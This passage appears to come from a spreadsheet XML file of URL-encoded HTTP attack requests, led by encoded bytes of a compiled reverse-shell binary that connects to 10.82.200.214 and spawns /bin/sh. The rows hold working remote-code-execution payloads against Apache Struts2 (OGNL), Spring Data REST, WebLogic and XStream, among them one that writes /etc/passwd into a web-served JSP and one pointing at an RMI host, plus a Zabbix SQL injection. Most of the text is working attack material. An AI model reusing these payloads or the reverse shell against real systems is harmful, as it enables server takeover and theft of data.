%27H%3D%17%20%20UH%E5%B4%8CH%3Dj%20%20%E8%85%BF%E8%88%BF%5D%C6%85p%20%20%01%C3%8F%1F%40f.%0F%1FH%3D%E9%84%A0H%3Fu%0B%E9%9E%BFf%0F%1FDH%05%06%20H4%E9%95%88%E5%BF%90%5D%E9%80%BFUH%E5%88%83%EC%B0%A4H%04%25%28HE1%3A%01%02%E8%B5%BEE%DC%88%C7%85H%C7%85%E8%80%80f%C7%85%C2%80H%05U%06%20%0F%09%C7%A8%29fE%E2%88%8B%05.%06%20HH%C7%B8%E8%BE%BEE%E4%88%8DM%CB%85%DC%BA%10H%CE%89%C7%A8E4%0A%E8%A7%BEE%DC%BE%C7%B8%E8%A3%BDE%DC%BE%01%C7%B8%E8%8F%BDE%DC%BE%02%C7%B8%E8%BB%BDH%3D5%E8%B5%BDHEdH3%04%25%28t%05%E8%B0%BD%C9%83H%EC%88%88%C4%88%C3%B10.82.200.214%2Fbin%2Fsh%01%1B%03%3B%18%02%3C4%DC%BE%5C%14%01zR%01x%10%01%1B%0C%20%08%01%24%1C%0E%10F%0E%18J%0F%0Bw%08%3F%1A%3B%2A3%24%22%1CDx%02%01A%0E%10%02C%0A%06%02%0C%20%08%10%09%40%09%D0%88%01%CC%80%0C%20%0AD%0A%19%E8%8D%A0%1B%10%1A%0A%20%1C%08o%01%05%40%04%060%02%0A%04%01%0B%18%03%10%20%02%14%20%17%06%20%05%08%20%01%09%18op%05o%01oD%05o%05%08%0E%20%20%C6%87%D6%87%E6%87%80%20%06%08%16%08%26%08X%10%20%13M%0AGCC%3A%20%28Ubuntu%205.4.0-6ubuntu1%7E16.04.12%29%205.4.0%2020160609%03%01%C8%81%03%02%01%03%030%02%03%04%40%04%03%05D%05%03%06p%05%03%20%05%03%08%06%03%09%20%03%0A%20%03%0B0%08%03%0C%40%08%03%0AD%0A%03%0EM%0A%03%0Fd%0A%03%10%0A%03%11%E8%8D%A0%03%12%0A%20%03%13%0E%20%03%14%08%0E%20%03%15%C8%8F%20%03%16%10%20%03%17X%10%20%03%18p%10%20%03%19%01%04%0C%01%13%0E%20%19%02%0C%40%08%1B%02%0C%08.%02%0C%D0%88D%01%18p%10%20%01S%01%12%0A%20z%02%0C%10%09%01%11%E8%8D%A0%04%02%0C%40%09%02%01%01%04%01%10%CA%80%C7%80%01%13%0E%20%04%D3%80%01%17X%10%20%01%14%08%0E%20%E9%80%80%0Fd%0A%01%17p%10%20%08%01%01%16%10%20%1E%01%20%3A%01%10%17p%10%20A%01%12%0AD%0AG%01%12c%01%12v%01%12%01%11%17h%10%20%08%01%12%01%12%01%20%CC%81%10%18x%10%20%D1%81%10%18p%10%20%DD%81%11%17%60%10%20%04%E9%81%80%20%01%12%0F%02%12%24%02%20%3E%02%22Z%02%12%09%20%60%02%12crtstuff.c__JCR_LIST__deregister_tm_clones__do_global_dtors_auxcompleted.7594__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entryexp.creverse_shell__FRAME_END____JCR_END____dso_handle_DYNAMIC__GNU_EH_FRAME_HDR__TMC_END___GLOBAL_OFFSET_TABLE__ITM_deregisterTMCloneTable_edata_fini__stack_chk_fail%40%40GLIBC_2.4htons%40%40GLIBC_2.2.5dup2%40%40GLIBC_2.2.5server_ipexecve%40%40GLIBC_2.2.5inet_addr%40%40GLIBC_2.2.5__gmon_start___end__bss_startserver_port_Jv_RegisterClassesexit%40%40GLIBC_2.2.5connect%40%40GLIBC_2.2.5_ITM_registerTMCloneTable__cxa_finalize%40%40GLIBC_2.2.5_initsocket%40%40GLIBC_2.2.5.symtab.strtab.shstrtab.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.got.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.jcr.dynamic.got.plt.data.bss.comment%1B%20%02%C8%81%C8%81%24%04.o%02%01%01%40%03%088%0B%020%020%02%10%02%04%02%08%18%40%03%02%40%04%40%04%04%01%01Ho%02D%05D%05%2C%03%02%02Uo%02p%05p%050%04%01%08d%04%02%05%05%20%01%03%08%18n%04B%06%06%03%16%08%18x%01%06%20%20%1A%04s%01%06%20%20%10%10%7E%01%060%080%08%10%08%01%06%40%08%40%08%02%02%10%01%06D%0AD%0A%09%04%01%02M%0AM%0A%16%01%01%02d%0Ad%0A%1C%04%01%02%0A%0Ad%08%0E%03%E8%8D%A0%E8%8D%80%10%08%0F%03%0A%20%0A%08%08%CB%80%01%03%0E%20%0E%08%08%D0%80%06%03%08%0E%20%08%0E%01%04%08%10%01%03%C8%8F%20%C8%8F8%08%08%D9%80%01%03%10%20%10X%08%08%E2%80%80%01%03X%10%20X%10%18%08%E8%80%80%08%03p%10%20p%10%08%01%ED%80%80%010p%105%01%01%11%03L%19%01%01%02%100%06%1C.%08%18%09%03%D8%96t%02%01</v>
      </c>
    </row>
    <row r="8" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A8" s="2" t="s">
        <v>6</v>
      </c>
      <c r="B8" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C8" t="s">
        <v>131</v>
      </c>
      <c r="D8" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2Fexample%2FHelloWorld.action%3F%28%2527%255cu0023_memberAccess%5B%255c%2527allowStaticMethodAccess%255c%2527%5D%2527%29%28vaaa%29%3Dtrue%26%28aaaa%29%28%28%2527%255cu0023context%5B%255c%2527xwork.MethodAccessor.denyMethodExecution%255c%2527%5D%255cu003d%255cu0023vccc%2527%29%28%255cu0023vccc%255cu003dnew%2520java.lang.Boolean%28%2522false%2522%29%29%29%26%28asdf%29%28%28%27%255cu0023rt.exec%28%2522touch%40%2Ftmp%2Fsuccess3%2522.split%28%2522%40%2522%29%29%27%29%28%255cu0023rt%255cu003d%40java.lang.Runtime%40getRuntime%28%29%29%29%3D1%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_10_1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2227.1%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="9" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A9" s="2" t="s">
        <v>129</v>
      </c>
      <c r="B9" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C9" t="s">
        <v>132</v>
      </c>
      <c r="D9" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2F%2524%257b%2523%2563%256f%256e%2574%2565%2578%2574%255b%2527%2578%2577%256f%2572%256b%252e%254d%2565%2574%2568%256f%2564%2541%2563%2563%2565%2573%2573%256f%2572%252e%2564%2565%256e%2579%254d%2565%2574%2568%256f%2564%2545%2578%2565%2563%2575%2574%2569%256f%256e%2527%255d%253d%2566%2561%256c%2573%2565%252c%2523%256d%253d%2523%255f%256d%2565%256d%2562%2565%2572%2541%2563%2563%2565%2573%2573%252e%2567%2565%2574%2543%256c%2561%2573%2573%2528%2529%252e%2567%2565%2574%2544%2565%2563%256c%2561%2572%2565%2564%2546%2569%2565%256c%2564%2528%2527%2561%256c%256c%256f%2577%2553%2574%2561%2574%2569%2563%254d%2565%2574%2568%256f%2564%2541%2563%2563%2565%2573%2573%2527%2529%252c%2523%256d%252e%2573%2565%2574%2541%2563%2563%2565%2573%2573%2569%2562%256c%2565%2528%2574%2572%2575%2565%2529%252c%2523%256d%252e%2573%2565%2574%2528%2523%255f%256d%2565%256d%2562%2565%2572%2541%2563%2563%2565%2573%2573%252c%2574%2572%2575%2565%2529%252c%2523%2571%253d%2540%256f%2572%2567%252e%2561%2570%2561%2563%2568%2565%252e%2563%256f%256d%256d%256f%256e%2573%252e%2569%256f%252e%2549%254f%2555%2574%2569%256c%2573%2540%2574%256f%2553%2574%2572%2569%256e%2567%2528%2540%256a%2561%2576%2561%252e%256c%2561%256e%2567%252e%2552%2575%256e%2574%2569%256d%2565%2540%2567%2565%2574%2552%2575%256e%2574%2569%256d%2565%2528%2529%252e%2565%2578%2565%2563%2528%2527%2577%2568%256f%2561%256d%2569%2527%2529%252e%2567%2565%2574%2549%256e%2570%2575%2574%2553%2574%2572%2565%2561%256d%2528%2529%2529%252c%2523%2571%257d.action%20HTTP%2F1.1%0AUpgrade-Insecure-Requests%3A%201%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F98.0.4758.82%20Safari%2F537.36%0AConnection%3A%20close</v>
      </c>
    </row>
    <row r="10" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A10" s="2" t="s">
        <v>7</v>
      </c>
      <c r="B10" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C10" t="s">
        <v>133</v>
      </c>
      <c r="D10" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2Findex.action%3Fmethod%3A%2523_memberAccess%253d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%2C%2523res%253d%2540org.apache.struts2.ServletActionContext%2540getResponse%28%29%2C%2523res.setCharacterEncoding%28%2523parameters.encoding%255B0%255D%29%2C%2523w%253d%2523res.getWriter%28%29%2C%2523s%253dnew%2Bjava.util.Scanner%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%2523parameters.cmd%255B0%255D%29.getInputStream%28%29%29.useDelimiter%28%2523parameters.pp%255B0%255D%29%2C%2523str%253d%2523s.hasNext%28%29%253f%2523s.next%28%29%253a%2523parameters.ppp%255B0%255D%2C%2523w.print%28%2523str%29%2C%2523w.close%28%29%2C1%3F%2523xx%3A%2523request.toString%26pp%3D%255C%255CA%26ppp%3D%2520%26encoding%3DUTF-8%26cmd%3Did%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.4%3B%20WOW64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2225.0%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="11" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A11" s="2" t="s">
        <v>8</v>
      </c>
      <c r="B11" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C11" t="s">
        <v>134</v>
      </c>
      <c r="D11" t="str">
        <f t="shared" si="0"/>
        <v>POST%20%2F%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.3%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F37.0.2049.0%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%200%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20%22%25%7B%28%23xxx%3D%27multipart%2Fform-data%27%29.%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27%22whoami%22%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D%22%0A</v>
      </c>
    </row>
    <row r="12" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A12" s="2" t="s">
        <v>9</v>
      </c>
      <c r="B12" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C12" t="s">
        <v>135</v>
      </c>
      <c r="D12" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2Fstruts2-showcase%2F%24%257B233%2A233%257D%2FactionChain1.action%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%205.1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F35.0.2117.157%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="13" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A13" s="2" t="s">
        <v>10</v>
      </c>
      <c r="B13" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C13" t="s">
        <v>136</v>
      </c>
      <c r="D13" t="str">
        <f t="shared" si="0"/>
        <v>PATCH%20%2Fcustomers%2F1%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_9_2%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F36.0.1944.0%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20200%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fjson-patch%2Bjson%0A%0A%5B%7B%20%22op%22%3A%20%22replace%22%2C%20%22path%22%3A%20%22T%28java.lang.Runtime%29.getRuntime%28%29.exec%28new%20java.lang.String%28new%20byte%5B%5D%7B116%2C111%2C117%2C99%2C104%2C32%2C47%2C116%2C109%2C112%2C47%2C115%2C117%2C99%2C99%2C101%2C115%2C115%7D%29%29%2Flastname%22%2C%20%22value%22%3A%20%22vulhub%22%20%7D%5D</v>
      </c>
    </row>
    <row r="14" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A14" s="2" t="s">
        <v>11</v>
      </c>
      <c r="B14" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C14" t="s">
        <v>137</v>
      </c>
      <c r="D14" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2Flatest.php%3Foutput%3Dajax%26sid%3D6398f8cc76b768d6%26favobj%3Dtoggle%26toggle_open_state%3D1%26toggle_ids%5B%5D%3Dupdatexml%280%2Cconcat%280xa%2Cuser%28%29%29%2C0%29%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28X11%3B%20Linux%20x86_64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F34.0.1847.137%20Safari%2F4E423F%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="15" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A15" s="2" t="s">
        <v>12</v>
      </c>
      <c r="B15" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C15" t="s">
        <v>138</v>
      </c>
      <c r="D15" t="str">
        <f t="shared" si="0"/>
        <v>POST%20%2F_async%2FAsyncResponseService%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20WOW64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F89.0.4389.114%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20831%0AAccept-Encoding%3A%20identity%0ASOAPAction%3A%20%0Acmd%3A%20whoami%0Acontent-type%3A%20text%2Fxml%0A%0A%3Csoapenv%3AEnvelope%20xmlns%3Asoapenv%3D%22http%3A%2F%2Fschemas.xmlsoap.org%2Fsoap%2Fenvelope%2F%22%20xmlns%3Awsa%3D%22http%3A%2F%2Fwww.w3.org%2F2005%2F08%2Faddressing%22%0Axmlns%3Aasy%3D%22http%3A%2F%2Fwww.bea.com%2Fasync%2FAsyncResponseService%22%3E%0A%3Csoapenv%3AHeader%3E%0A%3Cwsa%3AAction%3Exx%3C%2Fwsa%3AAction%3E%0A%3Cwsa%3ARelatesTo%3Exx%3C%2Fwsa%3ARelatesTo%3E%0A%3Cwork%3AWorkContext%20xmlns%3Awork%3D%22http%3A%2F%2Fbea.com%2F2004%2F06%2Fsoap%2Fworkarea%2F%22%3E%0A%3Cvoid%20class%3D%22java.lang.ProcessBuilder%22%3E%0A%3Carray%20class%3D%22java.lang.String%22%20length%3D%223%22%3E%0A%3Cvoid%20index%3D%220%22%3E%0A%3Cstring%3E%2Fbin%2Fbash%3C%2Fstring%3E%0A%3C%2Fvoid%3E%0A%3Cvoid%20index%3D%221%22%3E%0A%3Cstring%3E-c%3C%2Fstring%3E%0A%3C%2Fvoid%3E%0A%3Cvoid%20index%3D%222%22%3E%0A%3Cstring%3Eecho%20%60cat%20%2Fetc%2Fpasswd%60%20%3E%20%20servers%2FAdminServer%2Ftmp%2F_WL_internal%2Fbea_wls_internal%2F9j4dqk%2Fwar%2Fcheat.jsp%0A%3C%2Fstring%3E%0A%3C%2Fvoid%3E%0A%3C%2Farray%3E%0A%3Cvoid%20method%3D%22start%22%2F%3E%3C%2Fvoid%3E%0A%3C%2Fwork%3AWorkContext%3E%0A%3C%2Fsoapenv%3AHeader%3E%0A%3Csoapenv%3ABody%3E%0A%3Casy%3AonAsyncDelivery%2F%3E%0A%3C%2Fsoapenv%3ABody%3E%3C%2Fsoapenv%3AEnvelope%3E</v>
      </c>
    </row>
    <row r="16" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A16" s="2" t="s">
        <v>13</v>
      </c>
      <c r="B16" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C16" t="s">
        <v>139</v>
      </c>
      <c r="D16" t="str">
        <f t="shared" si="0"/>
        <v>POST%20%2F%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_9_2%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F52.0.2762.73%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%200%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20%25%7B%28%23_%3D%27multipart%2Fform-data%27%29.%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27echo%20pwn%5Etest123%20pwn%241test123%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D%0A</v>
      </c>
    </row>
    <row r="17" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A17" s="2" t="s">
        <v>14</v>
      </c>
      <c r="B17" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C17" t="s">
        <v>135</v>
      </c>
      <c r="D17" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2Fstruts2-showcase%2F%24%257B233%2A233%257D%2FactionChain1.action%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%205.1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F35.0.2117.157%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="18" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A18" s="2" t="s">
        <v>15</v>
      </c>
      <c r="B18" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C18" t="s">
        <v>140</v>
      </c>
      <c r="D18" t="str">
        <f t="shared" si="0"/>
        <v>PUT%20%2Ftest1.txt%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_8_3%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F54.0.2866.71%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%2011%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20text%2Fplain%0A%0Atest%20put111</v>
      </c>
    </row>
    <row r="19" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A19" s="2" t="s">
        <v>16</v>
      </c>
      <c r="B19" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C19" t="s">
        <v>141</v>
      </c>
      <c r="D19" t="str">
        <f t="shared" si="0"/>
        <v>POST%20%2F%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_9_2%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F36.0.1944.0%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%202984%0AAccept-Encoding%3A%20identity%0A%0A%3Csorted-set%3E%0A%0A%20%3Cjavax.naming.ldap.Rdn_-RdnEntry%3E%0A%0A%20%20%3Ctype%3Eysomap%3C%2Ftype%3E%0A%0A%20%20%3Cvalue%20class%3D%27com.sun.org.apache.xpath.internal.objects.XRTreeFrag%27%3E%0A%0A%20%20%20%3Cm__DTMXRTreeFrag%3E%0A%0A%20%20%20%20%20%3Cm__dtm%20class%3D%27com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM%27%3E%0A%0A%20%20%20%20%20%20%3Cm__size%3E-10086%3C%2Fm__size%3E%0A%0A%20%20%20%20%20%20%3Cm__mgrDefault%3E%0A%0A%20%20%20%20%20%20%20%3C__overrideDefaultParser%3Efalse%3C%2F__overrideDefaultParser%3E%0A%0A%20%20%20%20%20%20%20%3Cm__incremental%3Efalse%3C%2Fm__incremental%3E%0A%0A%20%20%20%20%20%20%20%3Cm__source__location%3Efalse%3C%2Fm__source__location%3E%0A%0A%20%20%20%20%20%20%20%3Cm__dtms%3E%0A%0A%20%20%20%20%20%20%20%20%3Cnull%2F%3E%0A%0A%20%20%20%20%20%20%20%3C%2Fm__dtms%3E%0A%0A%20%20%20%20%20%20%20%3Cm__defaultHandler%2F%3E%0A%0A%20%20%20%20%20%20%3C%2Fm__mgrDefault%3E%0A%0A%20%20%20%20%20%20%3Cm__shouldStripWS%3Efalse%3C%2Fm__shouldStripWS%3E%0A%0A%20%20%20%20%20%20%3Cm__indexing%3Efalse%3C%2Fm__indexing%3E%0A%0A%20%20%20%20%20%20%3Cm__incrementalSAXSource%20class%3D%27com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces%27%3E%0A%0A%20%20%20%20%20%20%20%3CfPullParserConfig%20class%3D%27com.sun.rowset.JdbcRowSetImpl%27%20serialization%3D%27custom%27%3E%0A%0A%20%20%20%20%20%20%20%20%3Cjavax.sql.rowset.BaseRowSet%3E%0A%0A%20%20%20%20%20%20%20%20%20%20%3Cdefault%3E%0A%0A%20%20%20%20%20%20%20%20%20%20%3Cconcurrency%3E1008%3C%2Fconcurrency%3E%0A%0A%20%20%20%20%20%20%20%20%20%20%3CescapeProcessing%3Etrue%3C%2FescapeProcessing%3E%0A%0A%20%20%20%20%20%20%20%20%20%20%3CfetchDir%3E1000%3C%2FfetchDir%3E%0A%0A%20%20%20%20%20%20%20%20%20%20%3CfetchSize%3E0%3C%2FfetchSize%3E%0A%0A%20%20%20%20%20%20%20%20%20%20%3Cisolation%3E2%3C%2Fisolation%3E%0A%0A%20%20%20%20%20%20%20%20%20%20%3CmaxFieldSize%3E0%3C%2FmaxFieldSize%3E%0A%0A%20%20%20%20%20%20%20%20%20%20%3CmaxRows%3E0%3C%2FmaxRows%3E%0A%0A%20%20%20%20%20%20%20%20%20%20%3CqueryTimeout%3E0%3C%2FqueryTimeout%3E%0A%0A%20%20%20%20%20%20%20%20%20%20%3CreadOnly%3Etrue%3C%2FreadOnly%3E%0A%0A%20%20%20%20%20%20%20%20%20%20%3CrowSetType%3E1004%3C%2FrowSetType%3E%0A%0A%20%20%20%20%20%20%20%20%20%20%3CshowDeleted%3Efalse%3C%2FshowDeleted%3E%0A%0A%20%20%20%20%20%20%20%20%20%20%3CdataSource%3Ermi%3A%2F%2F192.168.248.132%3A1099%2Fhyozdi%3C%2FdataSource%3E%0A%0A%20%20%20%20%20%20%20%20%20%20%3Clisteners%2F%3E%0A%0A%20%20%20%20%20%20%20%20%20%20%3Cparams%2F%3E%0A%0A%20%20%20%20%20%20%20%20%20%3C%2Fdefault%3E%0A%0A%20%20%20%20%20%20%20%20%3C%2Fjavax.sql.rowset.BaseRowSet%3E%0A%0A%20%20%20%20%20%20%20%20%3Ccom.sun.rowset.JdbcRowSetImpl%3E%0A%0A%20%20%20%20%20%20%20%20%20%3Cdefault%2F%3E%0A%0A%20%20%20%20%20%20%20%20%3C%2Fcom.sun.rowset.JdbcRowSetImpl%3E%0A%0A%20%20%20%20%20%20%20%3C%2FfPullParserConfig%3E%0A%0A%20%20%20%20%20%20%20%3CfConfigSetInput%3E%0A%0A%20%20%20%20%20%20%20%20%3Cclass%3Ecom.sun.rowset.JdbcRowSetImpl%3C%2Fclass%3E%0A%0A%20%20%20%20%20%20%20%20%3Cname%3EsetAutoCommit%3C%2Fname%3E%0A%0A%20%20%20%20%20%20%20%20%3Cparameter-types%3E%0A%0A%20%20%20%20%20%20%20%20%20%3Cclass%3Eboolean%3C%2Fclass%3E%0A%0A%20%20%20%20%20%20%20%20%3C%2Fparameter-types%3E%0A%0A%20%20%20%20%20%20%20%3C%2FfConfigSetInput%3E%0A%0A%20%20%20%20%20%20%20%3CfConfigParse%20reference%3D%27..%2FfConfigSetInput%27%2F%3E%0A%0A%20%20%20%20%20%20%20%3CfParseInProgress%3Efalse%3C%2FfParseInProgress%3E%0A%0A%20%20%20%20%20%20%3C%2Fm__incrementalSAXSource%3E%0A%0A%20%20%20%20%20%20%3Cm__walker%3E%0A%0A%20%20%20%20%20%20%20%3CnextIsRaw%3Efalse%3C%2FnextIsRaw%3E%0A%0A%20%20%20%20%20%20%3C%2Fm__walker%3E%0A%0A%20%20%20%20%20%20%3Cm__endDocumentOccured%3Efalse%3C%2Fm__endDocumentOccured%3E%0A%0A%20%20%20%20%20%20%3Cm__idAttributes%2F%3E%0A%0A%20%20%20%20%20%20%3Cm__textPendingStart%3E-1%3C%2Fm__textPendingStart%3E%0A%0A%20%20%20%20%20%20%3Cm__useSourceLocationProperty%3Efalse%3C%2Fm__useSourceLocationProperty%3E%0A%0A%20%20%20%20%20%20%3Cm__pastFirstElement%3Efalse%3C%2Fm__pastFirstElement%3E%0A%0A%20%20%20%20%20%3C%2Fm__dtm%3E%0A%0A%20%20%20%20%20%3Cm__dtmIdentity%3E1%3C%2Fm__dtmIdentity%3E%0A%0A%20%20%20%3C%2Fm__DTMXRTreeFrag%3E%0A%0A%20%20%20%3Cm__dtmRoot%3E1%3C%2Fm__dtmRoot%3E%0A%0A%20%20%20%3Cm__allowRelease%3Efalse%3C%2Fm__allowRelease%3E%0A%0A%20%20%3C%2Fvalue%3E%0A%0A%20%3C%2Fjavax.naming.ldap.Rdn_-RdnEntry%3E%0A%0A%20%3Cjavax.naming.ldap.Rdn_-RdnEntry%3E%0A%0A%20%20%3Ctype%3Eysomap%3C%2Ftype%3E%0A%0A%20%20%3Cvalue%20class%3D%27com.sun.org.apache.xpath.internal.objects.XString%27%3E%0A%0A%20%20%20%3Cm__obj%20class%3D%27string%27%3Etest%3C%2Fm__obj%3E%0A%0A%20%20%3C%2Fvalue%3E%0A%0A%20%3C%2Fjavax.naming.ldap.Rdn_-RdnEntry%3E%0A%0A%3C%2Fsorted-set%3E%0A%0A</v>
      </c>
    </row>
    <row r="20" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A20" s="2" t="s">
        <v>17</v>
      </c>
      <c r="B20" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C20" t="s">
        <v>136</v>
      </c>
      <c r="D20" t="str">
        <f t="shared" si="0"/>
